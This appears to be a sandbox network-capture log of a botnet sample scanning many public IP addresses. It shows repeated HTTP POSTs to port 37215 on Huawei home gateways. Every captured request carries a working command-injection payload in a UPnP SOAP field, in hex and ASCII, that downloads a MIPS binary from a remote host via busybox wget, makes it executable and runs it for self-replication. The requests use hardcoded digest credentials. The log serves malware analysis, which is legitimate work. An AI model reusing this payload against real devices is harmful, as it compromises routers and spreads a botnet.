20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2207192.168.2.1532930157.71.143.23537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.159082890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2208192.168.2.1544050157.95.209.11437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.159095049 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2209192.168.2.1552492152.185.205.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.159112930 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2210192.168.2.1554682101.69.210.10637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.206563950 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2211192.168.2.1534912211.80.147.14337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.206583023 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2212192.168.2.1550500157.253.119.24537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.206609964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2213192.168.2.155539244.141.182.8737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.211715937 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2214192.168.2.154372841.240.113.637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.216658115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2215192.168.2.1557560157.167.205.14437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.238121986 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2216192.168.2.154660063.225.51.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.238290071 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2217192.168.2.1548856197.77.120.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:26.244215965 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
